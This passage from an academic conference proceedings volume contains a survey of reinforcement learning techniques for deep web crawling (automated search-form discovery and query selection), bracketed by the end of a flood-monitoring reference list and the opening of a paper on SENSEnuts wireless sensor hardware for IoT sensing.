9. Singh, V. P., Jain, S., & Singhai, J. (2010). Hello flood attack and its countermeasures in wireless
sensor networks. International Journal of Computer Science Issues (IJCSI), 7(3), 23.
10. Lee, J. U., Kim, J. E., Kim, D., Chong, P. K., Kim, J., & Jang, P. (2008, September). RFMS: Real-
time flood monitoring system with wireless sensor networks. In 2008 5th IEEE International
Conference on Mobile Ad Hoc and Sensor Systems (pp. 527–528). IEEE.
11. Hughes, D., Greenwood, P., Blair, G., Coulson, G., Grace, P., Pappenberger, F., … Beven,
K. (2008). An experiment with reflective middleware to support grid-based flood monitoring.
Concurrency and Computation: Practice and Experience, 20(11), 1303–1316.
12. Roy, J. K., Gupta, D., & Goswami, S. (2012, December). An improved flood warning system
using WSN and Artificial Neural Network. In 2012 Annual IEEE India Conference (INDICON)
(pp. 770–774). IEEE.
13. Castillo-Effer, M., Quintela, D. H., Moreno, W., Jordan, R., & Westhoff, W. (2004, November).
Wireless sensor networks for flash-flood alerting. In Proceedings of the Fifth IEEE International
Caracas Conference on Devices, Circuits and Systems, 2004 (Vol. 1, pp. 142–146). IEEE.
14. Merkuryeva, G., Merkuryev, Y., Sokolov, B. V., Potryasaev, S., Zelentsov, V. A., & Lektauers, A.
(2015). Advanced river flood monitoring, modelling and forecasting. Journal of Computational
Science, 10, 77–85.
15. Ahamed, A., & Bolten, J. D. (2017). A MODIS-based automated flood monitoring system for
southeast Asia. International Journal of Applied Earth Observation and Geoinformation, 61,
104–117.
16. Alfieri, L., Cohen, S., Galantowicz, J., Schumann, G. J., Trigg, M. A., Zsoter, E., …, Rudari,
R. (2018). A global network for operational flood risk reduction. Environmental Science and
policy, 84, 149–158.
17. Seal, V., Raha, A., Maity, S., Mitra, S. K., Mukherjee, A., & Naskar, M. K. (2012). A simple
flood forecasting scheme using wireless sensor networks. arXiv preprint arXiv:1203.2511.
18. Panganiban, E. B., & Cruz, J. C. D. (2017, November). Rain water level information with
flood warning system using flat clustering predictive technique. In TENCON 2017–2017 IEEE
Region 10 Conference (pp. 727–732). IEEE.
19. Udo, E. N., & Isong, E. B. (2013). Flood monitoring and detection system using wireless sensor
network. Asian Journal of Computer and Information Systems, 1(04).
20. Jegadeesan, S., Dhamodaran, M., & Sri Shanmugapriya, S. (2018). Wireless sensor network
based flood and water quality monitoring system using IoT. Taga Journal of Graphic
Technology, Online ISSN (1748-0345).
21. Yoon, S., Ye, W., Heidemann, J., Littlefield, B., & Shahabi, C. (2011). SWATS: Wireless sensor
networks for steamflood and waterflood pipeline monitoring. IEEE Network, 25(1), 50–56.
Reinforcement Learning in Deep Web
Crawling: Survey

Kapil Madan and Rajesh Bhatia

Abstract Context: Reinforcement learning (RL) can help in solving various chal-
lenges of deep web crawling. Deep web content can be accessed by filling the search
forms rather than hyperlinks. Understanding the search form and proper selection
of queries are necessary steps to retrieve the deep web content successfully. Thus,
crawling the deep web is a very challenging task. The reinforcement learning-based
technique helps in filling the search form and retrieving the deep web content success-
fully. RL selects the action based on the given state, and the environment assigns
reward/penalty to the selected action. Objective: This study reports a survey of RL-
based techniques applied in the domain of deep web crawling. Method: Existing liter-
ature survey is based on 31 articles from 77 articles published in various reputed jour-
nals, conferences, and workshops. Results: Challenges related to various crawling
steps of deep web crawling are presented. RL-based techniques are being used in
multiple research papers, which solves deep web crawling challenges. Comparative
analysis of RL techniques used in deep web crawling is done based on the strength,
metrics, dataset, and research gaps. Conclusion: Various RL-based techniques can
be applied to deep web crawling, which has not been explored yet. Open challenges
and research directions are also recommended.

Keywords Reinforcement learning · Deep web · Ranked deep web · Query · Form
discovery · Query selection · Information Retrieval

1 Introduction

The World Wide Web is a collection of documents that are connected by hyperlinks.
This collection is called the surface web, which is being crawled by various standard
search engines. The part of web which is not accessed by hyperlinks but accessed

K. Madan (B) · R. Bhatia


Punjab Engineering College (Deemed to be University), Chandigarh, India
R. Bhatia
e-mail: rbhatia@pec.edu.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 291
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_24
292 K. Madan and R. Bhatia

through search forms is called the deep web or hidden web. Bergman coined the
term deep web in 2001 and estimated the size of the deep web, which is 7500
terabytes compared to 19 terabytes of surface web [1]. 95% of deep web content is
freely available in the public domain. The importance of deep web content can’t be
ignored because it also contains high-quality information as compared to the surface
web. A deep web crawler finds the search forms, identifies their labels, fills them
with the relevant keywords, submits the form, and crawls the relevant region. Deep
web crawling (DWC) consists of five steps [2]: First is automated deep web entry
point discovery, second is form modeling, third is query selection, fourth is form
submission, and fifth is crawling paths learning. Various researchers have proposed
different methods to explore the deep web [3, 4]. In DWC, a user enters the query in the
search form, and then, all matched documents are returned. Whereas in ranked DWC,
a particular query is entered in the search form, and then only k matched documents
are returned. Designing a crawler that explored the deep web and ranked deep web
is challenging. Reinforcement learning (RL) has gained tremendous popularity in
the industry and academic domain due to its self-learning characteristics [5]. Various
techniques based on RL are used in deep web to solve these challenges, as discussed
in Section 3. Different survey papers of DWC techniques were analyzed [6–10]. None
of the survey papers have been published wherein detailed RL-based techniques in
DWC have been discussed. These survey papers cover only one or two research
papers related to RL in the context of DWC. This motivates us to explore the DWC
survey based on RL. To do this survey, the following search string has been prepared
that has value—‘reinforcement learning’ technique in ‘deep web crawling.’ This
search string was executed on the Google scholar website that returns 77 results
[11]. Irrelevant research papers were discarded based on manual inspection of title,
followed by an abstract and full text read in three steps. Figure 1 shows the survey
selection criteria for picking the research papers. Step 1 is based on the title of a
research paper, and the count is reduced to 70. In step 2, the exclusion is done on

Fig. 1 Research paper


selection procedure
#77

• Title based
exclusion #70
(Step 1)

• Abstract
based
exclusion #55
(Step 2)

• Full text
based
exclusion #31
(Step 3)
Reinforcement Learning in Deep Web Crawling: Survey 293

the basis of the abstract. Now, the research paper count is decreased to 55. In step
3, the selection is based on a full text read. The final count of research paper is 31.
This collection has 16 journal papers, 11 conference papers, and 4 book chapters.
Publishers of the above said collection are Springer, IEEE, ACM, Elsevier, Wiley,
etc.
The contributions of this research paper can be summarized as follows:
• To the best of our knowledge, it is the first survey paper that explores the research
papers of RL in the context of DWC.
• A comparative analysis of the various research papers has been done to explore
their functionality, dataset, metrics, and research gaps.
• A discussion on various open challenges of DWC and how RL can help to solve
these challenges.
The focus of the paper is to organize the various research papers related to RL
in the context of DWC. The rest of the paper is structured as follows: Section 2
presents the background details related to DWC and RL. Section 3 discusses RL-
based research papers pertaining to DWC. Section 4 shows the discussion on various
RL-based techniques and their comparative analysis. Finally, Section 5 summarizes
the conclusion and its future directions.

2 Background

2.1 Deep Web Crawling

This section describes the basic terms needed to understand the deep web. There are
various types of forms such as search form, query form, login form, subscription
form, polling form, and registration form in deep web. Such forms are categorized
into two parts. The first is the searchable forms, and the second is the non-searchable
forms. Search form and query form come under the category of searchable forms,
and the rest of all types of forms comes under the non-searchable forms. Deep web
content can be accessed only through the searchable form. Finding the searchable
form, from other types of forms is a challenging task. The search form consists of
form labels, text boxes, drop-down lists, buttons, etc. Extraction of labels and their
semantics is the necessary steps to model the forms. Finding the searchable form and
form modeling are the two steps that come under the pre-query category [6]. After
form modeling, query selection is required for filling the search form. A labeled value
set table was proposed by Raghavan et al. to fill the search form [12]. This table has
key-value pairs that generate the query. A query is filled in the search form to submit
the form and retrieve the content automatically. The crawler needs to traverse the
path to retrieve the desired information.
294 K. Madan and R. Bhatia

2.2 Reinforcement Learning

RL is a type of machine learning that learns the optimal policy through the interaction
of the agent with environment [13]. The optimal policy is the guideline that helps to
select an appropriate action corresponding to a given state. The environment gives
a response based on the appropriate action. This response can either be a reward or
a penalty. It is always desirable to have a reward rather than a penalty. RL uses the
complete framework of the Markov decision process (MDP). MDP has four tuples (S,
A, P, R), whereas ‘S’ is the set of states, ‘A’ is the set of actions, ‘P’ is the probability
of reaching next state based on the given action, and ‘R’ is the immediate reward
produced by environment from a current state to next state. RL maps all entities
such as agent, environment, actions, states, reward function, objective function, and
transition function corresponding to the DWC problem. Q-learning and learning
automata are the types of RL algorithms used in the deep web [3, 3]. Designing the
reward function is a very challenging task. A minor change in the reward function
has a great impact on the policy. There are two types of methods to design the
reward function. First, the manual numeric method is based on domain knowledge.
Second is direct learning from the knowledge of experts using some techniques
like the preference-based RL technique. The preference-based RL technique can be
combined with the DWC domain to design the reward function [15]. Reward function
w.r.t DWC generally considers instant rewards rather than long-term rewards. This
challenge is known as the myopia problem. There are various models to overcome
this challenge, like Q-value-based approximation [3], infinite-horizon discounted
model [14], etc.

3 Review of Literature

Bergman et al. firstly introduced the term deep web, in which dynamic content is
generated by filling the query in search form [1]. Various surveys related to the deep
web were studied to find the number of RL technique-based papers. New research
dimensions can be investigated for the survey paper.
Hernandez et al. proposed a detailed survey of DWC techniques till 2017 [2].
However, this survey covered only two research papers based on the RL technique.
Moraes et al. recommended a systematic literature review based on search form
discovery techniques till mid of 2011 [6]. Only one RL paper based on form crawler
was covered.
Saini et al. have come up with a crawling survey paper in the field of information
retrieval till 2015 [8]. Only one research paper on RL was presented from the focused
crawling domain and missed the RL technique implementation in the deep web
domain.
Reinforcement Learning in Deep Web Crawling: Survey 295

Kumar et al. presented a systematic literature review of a web crawler comprising


of 248 papers published till the year 2014 [9]. It contained only two research papers
related to the RL technique.
Li et al. presented a short review paper on deep web data extraction techniques
till 2019 [10]. Only two research papers related to RL were discussed.
Shah et al. briefed a short survey consisting of 13 papers on focused crawling
and DWC [16]. Only one paper based on RL was presented that finds the searchable
forms.
It is concluded that the literature doesn’t have a detailed survey on RL techniques
in the deep web. An opportunity is there to explore the RL techniques in the domain
of DWC, which are discussed below.
Akilandeswari et al. designed a deep web crawler that locates the searchable form
and retrieves its content efficiently [17]. It used the RL technique with different
agents. Crawler explored the effective policy, which helps to find the searchable
forms from the web pages.
Jiang et al. proposed a framework for the deep web surfacing problem based on
RL approach [3]. An algorithm, namely Q-value approximation, handled the myopia
problem related to query in the deep web.
Castro et al. advised a machine learning-based algorithm to identify and clas-
sify the searchable forms from non-searchable forms [18]. This classification is the
essential step to access the deep web and remove the irrelevant forms.
Chakrabarti et al. coined the focused crawler, which has two classifiers, i.e.,
apprentice-based and critic-based [19]. A graph represented this crawling process,
and a webpage represents each node. A score of each node is modified by backprop-
agation in the crawl graph. The advantage of this approach is independent of crawler
implementation.
Sharma et al. devised a crawling technique based on query protocol server [20].
This technique has various modules such as multithreading modules, web page
analyzer, form submitter, and crawl frontier.
Singh et al. proposed an intelligent agent approach to crawl the deep web [21].
It has two agents and one coordinator. Each agent has three main components, i.e.,
feature learner, classifier, and crawler. RL helped to learn the new features. Their
objective was to collect maximum rewards. Various ensembles techniques can help
improve the classifier’s accuracy [22].
Zhang et al. recommended a formal concept analysis and lattice-based algorithm
for selecting the queries to retrieve the deep web content [23].
Pavai et al. recommended the probabilistic technique to improve the freshness of
deep and surface web [24]. Semantically similar queries were identified using the
WordNet dictionary.
Pratiba et al. proposed the distributed web crawler, which explored the deep web
[25]. Crawler comprised of Neo4J, HBase, and RL technique. Neo4J is a graph-based
database management system that helped to maintain the relationship between web
pages and their hierarchy. HBase is a Hadoop-based open project which stores web
documents. RL helped to crawl the deep web efficiently.
296 K. Madan and R. Bhatia

Kumar et al. proposed automata entitled ‘Hidden Web Distributed Learning


Automata’ for detecting new hidden web pages [14]. Ahmed et al. proposed a text
classification technique based on the RL and term frequency [26]. Word2vec tech-
nique was used to collect the neighboring keywords text and convert it into vectors.
These vectors helped to increase the classification accuracy. This technique can be
combined with optimal feature extraction [27].
Murali et al. presented a focused web crawler that retrieved online e-commerce
websites [28]. Mishra et al. proposed the reinforcement-based focused approach that
addressed the myopia problem [4].
Tahseen et al. proposed an architecture for crawling the deep web [29]. A deep web
crawler’s architecture contained a page downloader, URL extractor, form analyzer,
response analyzer, and frontier. Dataset had 1026 URLs. Precision and recall metrics
were used for evaluation.
Tanvir et al. proposed a technique based on word2vec and RL [30]. This technique
was used to find the semantic relation between words and documents.

4 Discussion

Thirty-one research papers out of the seventy-seven research papers have been studied
for this survey. No survey paper exists which covers the RL-based technique for
DWC. This is the main motivation behind this survey. This paper reviews the RL-
based techniques that are successfully applied to DWC. Table 1 shows the various
DWC techniques based on RL. Further, its comparative analysis, strength, and future
scope are also mentioned. RL-based techniques such as Q-value-based learning,
learning automata have already been explored in the literature. Various ensemble
approaches, i.e., term frequency–inverse document frequency (TF-IDF), RL with
word2vec, Cascading Style Sheets (CSS) visual properties with RL, and agent coor-
dinator architecture, were also used to traverse the deep web. Kumar et al. proposed
an algorithm based on learning automata to find the deep web pages [14]. This work
with query optimization can be used to crawl the ranked deep web also. Kaelbling
et al. explained the strength and weakness of various models for reward function such
as average reward model, finite horizon, infinite horizon, infinite-horizon discounted
model, normalized discounted cumulative gain, Q-value based approximation [5].
The selection of models also depends on the type of RL techniques. There is much
scope of RL-based techniques for DWC, as discussed in Section 5.

4.1 Open Questions in DWC

Searchable form discovery is an open challenge in DWC. It can be successfully done


with the help of RL-based techniques. These techniques use self-learning character-
istics to identify the search forms. A generic framework can be made to map all its
Reinforcement Learning in Deep Web Crawling: Survey 297

Table 1 Comparative analysis and research gaps


S. No Strength Dataset Metrics Future scope
1 Jiang et al. proposed a Abebooks, Yahoo Coverage Typed text boxes
Q-value movie, etc can be implemented
approximation with this technique
algorithm to deal with
the myopia problem
[3]
2 Mishra et al. solved DARPA MEMEX Relevancy score Ensemble and
the myopia problem dataset on human Meta-learning
using CSS visual trafficking approaches can be
properties and RL applied to improve
technique [4] further
3 Kumar et al. used an Open Directory Precision, Recall, Query optimization
algorithm using Project and Coverage plot techniques can be
learning automata to used for improving
find the deep web precision
pages [14]
4 Akilandeswar et al. 3450 web pages Number of This crawler can be
suggested a deep web searchable forms tested on a larger
crawler to find dataset for crawler
searchable forms generalization
from non-searchable
forms using the RL
technique [17]
5 Pavai et al. proposed Ten million tourist Crawl-hit rate and The crawl hit rate
a weighted semantic documents freshness needs to be
method to reduce the improved
number of queries
[24]
6 Ahmed et al. endorsed Sixteen hundred Precision, recall, Accuracy can be
a text classification web pages accuracy, and improved by
technique using F-score optimal text features
TF-IDF, word2vec,
and RL [26]
7 Tanvir et al. NASA and Korean Semantic relation This technique can
recommended a University websites (δ) be applied with
technique based on large datasets for
word2vec and RL to generalization
find the semantic
relation between the
query and its
document [30]
(continued)
298 K. Madan and R. Bhatia

Table 1 (continued)
S. No Strength Dataset Metrics Future scope
8 Patil et al. presented IndiaBix, Telenor Harvest rate, The greedy
the crawler Number of approach can be
architecture to searchable forms improved
explore the search
form using
Q-learning with ε
greedy approach [31]

elements corresponding to the deep web. Form modeling is a tedious task consisting
of label identification and its semantics. It can be implemented with RL-based tech-
niques. Transfer learning can be combined with RL to generate relevant keywords.
These keywords are filled in the search forms, more results are retrieved, and the
environment generates more reward. No work has been done on the sampling strate-
gies for information extraction over the ranked deep web. Transfer learning with
RL can help us to find the high-quality document sample for ranked deep web.
This high-quality document sample leads to achieve the minimum query submission
and maximum coverage. Thus, the environment gives more rewards and leads to
the optimal policy. Query selection of deep web is a challenging task. Finding the
optimal query set is an unsolved problem.

5 Conclusion and Future Scope

This paper surveys various techniques wherein RL has been successfully applied to
the deep web. Different survey papers have been studied to explore the research gaps
existing in the literature. RL-based techniques in the domain of DWC are still in their
infancy stage. Thus, RL-based techniques have immense potential for research in the
field of DWC. Comparative analysis of various techniques with their future scope has
been revealed. Some of the RL-based techniques have not been applied to DWC yet.
Researchers can explore such techniques, i.e., Deep Deterministic Policy Gradient,
Reinforce, Monte Carlo Policy Gradient, Reinforce with baseline, and Deep RL
techniques such as Deep Q-Network, Actor-critic based learning. These techniques
can help to solve the challenges of DWC. Designing the reward function is a crucial
part of RL. Various techniques, i.e., imitation learning, replay buffer, preference-
based RL, inverse RL, etc., can be used to define the reward function. The imitation
learning or inverse RL technique may help to design the reward function when a
reward function definition is not available.
Reinforcement Learning in Deep Web Crawling: Survey 299

References

1. Bergman, M. K. (2001). White paper: The deep web: Surfacing hidden value. Journal of
Electronic Publishing, 7(1).
2. Hernández, I., Rivero, C. R., & Ruiz, D. (2019). Deep web crawling: A survey. World Wide
Web, 22(4), 1577–1610.
3. Zheng, Q., Wu, Z., Cheng, X., Jiang, L., & Liu, J. (2013). Learning to crawl deep web.
Information Systems, 38(6), 801–819.
4. Mishra, A., Mattmann, C. A., Ramirez, P. M., & Burke, W. M. (2018). ROACH : Online
apprentice critic focused crawling via CSS cues and reinforcement. In Proceedings of ACM
Conference on Knowledge Discovery and Data Mining (KDDD 2018), August (pp. 1–9).
5. Leslie Pack Kaelbling, A. W. M., & Littman, M. L. (1996). Reinforcement learning: A survey.
Journal of Artificial Intelligence Research, 708–713.
6. Moraes, M. C., Heuser, C. A., Moreira, V. P., & Barbosa, D. (2013). Prequery discovery
of domain-specific query forms: A survey. IEEE Transactions on Knowledge and Data
Engineering, 25(8), 1830–1848.
7. Kantorski, G. Z., Moreira, V. P., & Heuser, C. A. (2015). Automatic filling of hidden web
forms. ACM SIGMOD Record, 44(1), 24–35.
8. Saini, C., & Arora, V. (2016). Information retrieval in web crawling: A survey. In 2016 Inter-
national Conference on Advances in Computing, Communications and Informatics (ICACCI)
(pp. 2635–2643).
9. Kumar, M., Bhatia, R., & Rattan, D. (2017). A survey of web crawlers for information retrieval.
WIREs Data Mining Knowledge Discovery, 7(6), e1218.
10. Li, S., Chen, C., Luo, K., & Song, B. (2019). Review of deep web data extraction. In 2019
IEEE Symposium Series on Computational Intelligence (SSCI) (pp. 1068–1070).
11. Google Scholar. 2020. [Online]. Available http://scholar.google.com/. Accessed 30 December
2020.
12. Raghavan, S., & Garcia-Molina, H. (2001). Crawling the hidden web. In 27th VLDB
Conference—Roma, Italy (pp. 1–10).
13. Sutton, R. S., & Barto, A. G. (1998). Reinforcement learning: An introduction.
14. Kumar, M., & Bhatia, R. (2018). Hidden webpages detection using distributed learning
automata. Journal of Web Engineering, 17(3–4), 270–283.
15. Wirth, C., Akrour, R., Neumann, G., & Fürnkranz, J. (2017). A survey of preference-based
reinforcement learning methods. Journal of Machine Learning Research, 2, 30–34.
16. Shah, S., Patel, S., & Nair, P. S. (2014). Focused and deep web crawling—A review.
International Journal of Computer Science and Information Technologies, 5(6), 7488–7492.
17. Akilandeswari, J., & Gopalan, N. P. (2007). A novel design of hidden web crawler using
reinforcement learning based agents. In Advanced parallel processing technologies (Vol. 4847,
pp. 433–440). Springer.
18. Marin-Castro, H. M., Sosa-Sosa, V. J., Martinez-Trinidad, J. F., & Lopez-Arevalo, I. (2013).
Automatic discovery of web query Interfaces using machine learning techniques. Journal of
Intelligent Information System, 40(1), 85–108.
19. Chakrabarti, S., Punera, K., & Subramanyam, M. (2002). Accelerated focused crawling through
online relevance feedback. In Proceedings of 11th International Conference on World Wide
Web, WWW’02 (pp. 148–159).
20. Sharma, D. K., & Sharma, A. K. (2011). A QIIIEP based domain specific hidden web crawler. In
Proceedings of the International Conference & Workshop on Emerging Trends in Technology—
ICWET ’11 (pp. 224–227).
21. Singh, L., & Sharma, D. K. (2013). An approach for accessing data from hidden web using
intelligent agent technology. In 2013 3rd IEEE International Advance Computing Conference
(IACC) (pp. 800–805).
22. Alzubi, O. A., Alzubi, J. A., Ramachandran, M., & Al-shami, S. (2020). An optimal
pruning algorithm of classifier ensembles: Dynamic programming approach. Neural Computer
Applications, 6.
300 K. Madan and R. Bhatia

23. Zhang, Z., Du, J., & Wang, L. (2013). Formal concept analysis approach for data extraction
from a limited deep web database. Journal of Intelligent Information System, 41(2), 211–234.
24. Pavai, G., & Geetha, T. V. (2017). Improving the freshness of the search engines by a
probabilistic approach based incremental crawler. Information Systems Frontiers, 19(5),
1013–1028.
25. Pratiba, D., Shobha, G., Lalithkumar, H., & Samrudh, J. (2017). Distributed web crawlers using
hadoop. International Journal of Applied Engineering Research, 12(24), 15187–15195.
26. Ahmed Md. Tanvir, M. C. (2019). Design and implementation of web crawler utilizing
unstructured data. Journal of Korea Multimedia Society, 22(3), 374–385.
27. Gupta, D., Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & De Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computer Application, 6.
28. Murali, R. (2018). An intelligent web spider for online e-commerce data extraction. In 2018
Second International Conference on Green Computing and Internet of Things (ICGCIoT)
(pp. 332–339).
29. Tahseen, I., & Salim, D. (2018). A proposal of deep web crawling system by using breath-first
approach. Iraqi Journal of Information and Communications Technology, 48–61.
30. Tanvir, A. M., Kim, Y., & Chung, M. (2019). Design and implementation of an efficient web
crawling using neural network. In Advances in computer science and ubiquitous computing
(pp. 116–122). Springer.
31. Patil, Y., & Patil, S. (2016). Implementation of enhanced web crawler for deep-web interfaces.
International Research Journal of Engineering and Technology, 2088–2092.
Wireless Sensor Network for Various
Hardware Parameters for Orientational
and Smart Sensing Using IoT

Mohammad Danish Gazi, Manisha Rajoriya, Pallavi Gupta,


and Ashish Gupta

Abstract SENSEnuts is a very advanced type of platform that gives very user-
friendly features like API that are easy to use, user modified source code, and GUI
and helps us in real-time analysis of the sensor data. Also another advantage of using
SENSEnuts is the connection of wireless devices at a very low rate and low-power
consumption. The data sensed from the sensor nodes is transferred to the Internet
through sensenodes Wi-Fi module. The data is usually stored in the cloud from where
we can easily analyze and monitor the sensed raw data. Using SENSEnuts package
of hardware such as GAP, HTP, TL sensor packages used in this paper, we can
monitor and overcome the conventional difficulties of hardware implementation,
design, and software rectification for conventional orientational sensor hardware
using accelerometer for analyzing different planes and motion of sensing and also its
usage in for humidity, pressure temperature sensing without any hassle free hardware
implementations that can be used in smart agricultural and for smart home systems.
This work carried out proves to be cost effective with high accuracy and precision
overcoming conventional hardware implementations with live updation from sensor
nodes to senslive GUI for accurate and precise detection and usage.

Keywords Internet of Things (IoT) · Wireless sensor network (WSN) ·


SENSEnuts · Senselive · GUI · GAP sensor · HTP · TL sensor

M. D. Gazi (B) · M. Rajoriya · P. Gupta · A. Gupta


Department of EC Engineering SET, Sharda University, Greater Noida, India
M. Rajoriya
e-mail: manisha.rajoriya@sharda.ac.in
P. Gupta
e-mail: pallavigupta2@sharda.ac.in
A. Gupta
e-mail: Ashishgupta1@sharda.ac.in

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 301
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_25
302 M. D. Gazi et al.

1 Introduction

Internet of Things (IoT), the general term used in new era of communication, points
to cases where connectivity between networks and the computational complexity
is extended toward sensors nodes and actuators allowing data-driven exchange of
information without any external intervention. In IoT, any node is connected to
the network is termed as smart as it consists of inbuilt intelligence that helps it to
perform the different kinds of tasks by itself. Wireless sensor network (WSN) has
an added advantage over other networks due to its remote location sensing where
monitoring of data is not possible. IoT has attracted numerous attentions in wide
range of applications. The major concern in today’s world is time and accuracy that
means many applications throughout the world need continuous attention, e.g., the
temperature of the boiler room needs to be continuously monitored, and an alarm
should be raised if the temperature goes out of margin line. For such purposes,
SENSEnuts is one of the best platforms that enables us to continuously gather real-
time data through sensor nodes in a way better accurate manner. However, in order
to store the data and to do post analysis of data coming from sensor nodes for further
applications, the data needs to be stored in a cloud.
This work is based on a wireless communication of sensor networks and combi-
nation of real-time data to IoT. In [1], the authors proposed a triaxial accelerometer-
based human detection using perceptron algorithmic theory and also by using neural
coding models, and this model requires extensive neural algorithm coding for three
plane position sensing that can be done very hassle free using SENSEnuts GAP sensor
package and by its respective GUIs in the proposed work. Khan et al. proposed a
triaxial accelerometer-based activity sensing using augmented feature and a hierar-
chical recognizer [2]. In [3], the authors proposed a system that is based on web-based
sewage monitoring system using a set of hardware containing the TL sensor. Jestrada-
Lopez et al. proposed smart soil parameters estimation system using an autonomous
wireless sensor networks with dynamic power strategy [4]. In this work, the soil
parameters that are suitable for growth of crops are chosen by using a deployed
wireless sensor network that consists of nodes and sensors. Work in [5] proposed
energy aware corona level-based routing approach for IEEE 802.15.4-based wire-
less sensor networks. Agarwal et al. explained design and implementation of medium
access control-based routing on real wireless sensor networks testbed [6].
In these above-mentioned works, authors have used sensing technologies like
RFID, PIC, GSM, Raspberry pi, and ZigBee and augmented reality-based coding
for using activity sensing using conventional type accelerometer only [6-8]. By those
type of heavy coded devices, they were able to control, analyzes the temperature,
humidity, and pressure, required for optimal agricultural usage. These papers provide
an idea for using the WSN with SENSEnuts platform for activity sensing, temper-
ature sensing, humidity and pressure sensing for agricultural usage, and other user
applications [8-10]. These papers give us an idea about the deployment of user special
IoT network systems for which the platform known as SENSEnuts is best suitable
Wireless Sensor Network for Various Hardware Parameters … 303

for its node to node communication, its robustness, and easily available GUI [10-14].
This platform is also very economical and can be used for research purposes [14-17].

2 WSN System Architecture

In this section, the basic WSN system architecture using SENSEnuts platform used
for this work is described. The easily usable graphical user interfaces in SENSEnuts
makes it in demand for industrial and research purposes. The WSN system architec-
ture can also be seen in Fig. 1 which gives us an accurate top to bottom hierarchy
how the different sensor nodes are connected to each other, giving us highly precise,
user-friendly with its auto updating GUIs. WSN being a modular type of design gives
a seamlessly integrated performance with fast node to node communication system.
Also being a modular type of design system makes it easy to install and also its faster
deployment. The WSN architecture can be easily understood from Table 1.

2.1 The Sensor Node

The proposed sensor module design structure in this work is shown in Fig. 1. The
lower most part consists of a 5 V battery. Above the battery, consists of a radio
module. The radio module contains a PCB antenna and a microcontroller used in it.
Above the radio modules, there are the sensor nodes attached. Also there exists USB
gateway module, also known as extender module that is usually attached on the top.
Specifications for each module (shown in Fig. 2) used are also given.
Extender: It is used to extend the microcontroller to other sensor devices. It also
debugs hardware and access SPI, UART, ADC, I2C protocols in it.
Radio module: The microcontroller used here is JN5168. It is used for wireless
transmission of real-time data. It consists of 802.15.4 IEE standard with its low-power
consumption type of 32 bit RISC controller consisting a clock size of 32 MHz with
a RAM of 32 and 256 kb flash memory and 4 kb EEPROM. The security in this type
of module is of the type of AES with receiving current of 17 mA and transmitting
current of 15 mA and transmission power that is of controllable in nature ranges
from −31 to +2.5 dBm.
Light and temperature sensor: The temperature sensing capability of this sensor
is from −24 to 80 °C degree with resolution of 12 bit. The light sensing capability is
measured in LUX, i.e., from 3 to 63 k LUX with a resolution of 16-bit with excellent
IR, UV rejection with 1.5 uA shutdown current.
Temperature pressure and humidity sensor: The sensors used here for measuring
humidity and pressure measure the relative humidity and pressure with a resolution
of 14 and 24-bit, respectively, with 0.04% RH.
304 M. D. Gazi et al.

Fig. 1 Sensor node

Soil moisture sensor: This type of sensor measures the moisture in soil by
measuring the change in equivalent resistance between the two nodes of sensor
probes.
GAP sensor: It is used for overall motion and positioning detection purposes. It
consists of GPS, a transceiver, accelerometer, PIR sensor, and an antenna with 14-bit,
8-bit digital output, and also consists of 2g, 4g, 8g dynamically selectable full scale
with a built in PIR with extremely low current consumption.
Wireless Sensor Network for Various Hardware Parameters … 305

Table 1 Characterization of implemented hardware


Hardware parameters Specifications
Package used SENSEnuts, PC, USB
Software used SENSEnuts toolchain, IDE
Communication methods 802.15.4 IEEE, USB, Wi-Fi gateway
Sensors used SENSEnuts GAP, TL, HTP
Radio modules JN5168, 32 bit with RISC architecture
Cloud services Any open-source cloud service
Memory 4 kb EPROM, 32 kb RAM, 256 kb FLASH
GUI SENSEnuts GUI visualizations
TL sensor Temp range: −24 to 80°, light range: 3 to 63 k lux
HTP sensor Humidity with 16-bit resolution and pressure with 24 bit
resolution
GAP sensor 8-bit to 16-bit output and ±2g, 4g, 8g resolution
Access medium CA, CSMA
Database used open source, SQL

Fig. 2 USB gateway module

Wi-Fi gateway system: It uses SPI interface system. The band coverage here is
with 2.4 GHz and 802.11/b/g/n Wi-Fi standard. It consists of a serial flash system
with Broadcom BCM43362 single band that includes Wi-Fi security modes like:
306 M. D. Gazi et al.

Open, WEP, WPA, WPA2-PSK with 1 MB flash memory and 128 kb SRAM with
Wi-Fi power save of 0.77 mA.

3 Implementation and Methodology

3.1 Overview

Figure 3 shows how quickly the sensor data is sent to the senselive network and
mentions all the connected devices used in the network such as sensor nodes, pan
coordinator, Wi-Fi module. Also there exists a different mac ids for different sensor
nodes. It also consists of gateway module for its connectivity for its overall IoT
setup. The SENSEnuts platform works on 802.15.4 IEEE standard that works on
user efficient parameters such as low bandwidth, low battery usage, and maximum
range of communication. Further the data coming from the sensor nodes is carried
through the network to the senselive user interface where it is stored and analyzed
for future applications (Fig. 9).

Fig. 3 TL sensor module


Wireless Sensor Network for Various Hardware Parameters … 307

3.2 Sensing and Processing the Information

The fundamental unit used here consists of the sensor nodes or modules that are
part of SENSEnuts platform that includes GAP sensor, TL sensor, and HTP sensor.
An external battery powered radio module is installed below the two sensor nodes
consisting of a coordinator setup in the middle of two sensor nodes. PAN coordinator
is also installed, as it has a radio module and a Wi-Fi module attached to it for
transmission and reception purposes. The PAN coordinator gets associated with the
coordinator and gets all the information carried forward to the PAN coordinator,
and then the information is forwarded to Wi-Fi module for its wireless transmission.
The functionality of PAN coordinator and coordinator is different, but there exist
a same hardware setup for both PAN coordinator and coordinator. The functional
differentiability exists whether the node is programmed for a PAN coordinator or
coordinator. The requirement of programming these modules are the drivers are
installed after the gateway module of the SENSEnuts platform is plugged in. The bin
file is generated that is to be flashed into the device after the code is built, compiled,
and made into the hex file. After that the GUI on SENSEnuts should be opened, whose
work is to display the raw data coming from the sensor nodes upon programming
the particular sensor node the both the PAN coordinator and coordinator are well
connected. Once both are associated with each other than the coordinator starts
sending the raw data wirelessly between PAN coordinator and coordinator and we
can easily see the live readings from our sensor nodes which that particular sensor is
designed and also usual checking of the MAC address for the attached sensor nodes
